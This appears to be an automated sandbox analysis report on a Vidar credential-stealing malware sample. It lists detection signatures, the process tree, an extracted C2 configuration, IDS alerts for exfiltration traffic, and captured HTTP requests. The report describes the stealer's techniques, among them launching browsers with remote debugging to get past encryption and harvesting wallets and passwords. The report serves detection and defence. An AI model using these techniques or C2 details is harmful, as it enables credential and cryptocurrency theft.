Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gVKsiQIHqe.exe

Overview

General Information

Sample name:gVKsiQIHqe.exe
renamed because original name is a hash value
Original sample name:2e45d5934db7da8ff7b560a80ceb96ab.exe
Analysis ID:1579643
MD5:2e45d5934db7da8ff7b560a80ceb96ab
SHA1:e1d653b1a6acbacd6eb592041d21786ca3a633c8
SHA256:f2c2df5d625c6983881695ab53416c52aa574821e01074f607b6039e5d79e76f
Tags:exeuser-abuse_ch
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Monitors registry run keys for changes
PE file has a writeable .text section
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • gVKsiQIHqe.exe (PID: 5564 cmdline: "C:\Users\user\Desktop\gVKsiQIHqe.exe" MD5: 2E45D5934DB7DA8FF7B560A80CEB96AB)
    • chrome.exe (PID: 5884 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 6156 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2868 --field-trial-handle=2812,i,12872953387069903488,11110384550952122137,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • msedge.exe (PID: 7720 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 7936 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2576 --field-trial-handle=2224,i,4927073609183200829,12100842426449448139,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 8004 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7432 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6520 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6384 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5948 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6444 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7760 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6504 --field-trial-handle=1996,i,16664765215465156230,11047928681594744707,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
gVKsiQIHqe.exeJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: gVKsiQIHqe.exe PID: 5564JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          Process Memory Space: gVKsiQIHqe.exe PID: 5564JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: gVKsiQIHqe.exe PID: 5564JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.gVKsiQIHqe.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                0.0.gVKsiQIHqe.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Browser Started with Remote Debugging
                  Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\gVKsiQIHqe.exe", ParentImage: C:\Users\user\Desktop\gVKsiQIHqe.exe, ParentProcessId: 5564, ParentProcessName: gVKsiQIHqe.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 5884, ProcessName: chrome.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-23T06:57:27.806392+010020442471Malware Command and Control Activity Detected94.130.188.57443192.168.2.549708TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-23T06:57:30.110607+010020518311Malware Command and Control Activity Detected94.130.188.57443192.168.2.549709TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-23T06:57:27.806148+010020490871A Network Trojan was detected192.168.2.54970894.130.188.57443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-23T06:57:22.889027+010028593781Malware Command and Control Activity Detected192.168.2.54970694.130.188.57443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: gVKsiQIHqe.exeMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                  Multi AV Scanner detection for submitted file
                  Source: gVKsiQIHqe.exeReversingLabs: Detection: 71%
                  Source: gVKsiQIHqe.exeVirustotal: Detection: 66%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                  Machine Learning detection for sample
                  Source: gVKsiQIHqe.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004078F0 StrStrA,lstrlenA,LocalAlloc,CryptUnprotectData,LocalAlloc,LocalFree,lstrlenA,0_2_004078F0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004116B0 CryptBinaryToStringA,HeapAlloc,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,HeapFree,GetProcessHeap,HeapFree,0_2_004116B0
                  Source: gVKsiQIHqe.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49916 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.5:49762 version: TLS 1.2
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00409460 FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,FindClose,0_2_00409460
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00407060 FindFirstFileA,strlen,strlen,memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,lstrcpyA,strlen,Sleep,??3@YAXPAX@Z,??3@YAXPAX@Z,CreateProcessA,Sleep,strlen,Sleep,strlen,strlen,??3@YAXPAX@Z,CloseDesktop,_invalid_parameter_noinfo_noreturn,0_2_00407060
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00401730 FindFirstFileA,FindFirstFileA,FindClose,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,FindFirstFileA,FindFirstFileA,DeleteFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_00401730
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_0040A5D0 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,0_2_0040A5D0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00406FE0 FindFirstFileA,FindFirstFileA,??3@YAXPAX@Z,_invalid_parameter_noinfo_noreturn,0_2_00406FE0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00413FF0 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,StrCmpCA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,DeleteFileA,DeleteFileA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindClose,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00413FF0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_0040C790 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040C790
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004081B0 ExpandEnvironmentStringsA,FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,DeleteFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_004081B0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_0040BC30 wsprintfA,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrlenA,lstrlenA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040BC30
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_004170D0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose,0_2_004170D0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00415700 HeapAlloc,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,_invalid_parameter_noinfo_noreturn,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,0_2_00415700
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00414BD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,lstrcatA,lstrcatA,0_2_00414BD0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00413FF0 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,StrCmpCA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,DeleteFileA,DeleteFileA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindClose,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00413FF0
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: chrome.exeMemory has grown: Private usage: 1MB later: 38MB

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 94.130.188.57:443 -> 192.168.2.5:49709
                  Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:49706 -> 94.130.188.57:443
                  Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:49708 -> 94.130.188.57:443
                  Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 94.130.188.57:443 -> 192.168.2.5:49708
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                  Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                  Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                  Source: Joe Sandbox ViewIP Address: 18.164.116.39 18.164.116.39
                  Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                  Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49916 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.7
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 18.164.116.39
                  Source: unknownTCP traffic detected without corresponding DNS query: 18.164.116.39
                  Source: unknownTCP traffic detected without corresponding DNS query: 18.164.116.39
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 18.164.116.39
                  Source: unknownTCP traffic detected without corresponding DNS query: 18.164.116.39
                  Source: unknownTCP traffic detected without corresponding DNS query: 18.164.116.39
                  Source: unknownTCP traffic detected without corresponding DNS query: 18.164.116.39
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeCode function: 0_2_00404280 InternetOpenA,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00404280
                  Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: toptek.sbsConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCJDKzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCJDKzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /b?rn=1734933482036&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1527A764E6A86BDB2DE6B23AE7AF6A4B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /b2?rn=1734933482036&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1527A764E6A86BDB2DE6B23AE7AF6A4B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1B5aaed1ef292e4cd07b08d1734933482; XID=1B5aaed1ef292e4cd07b08d1734933482
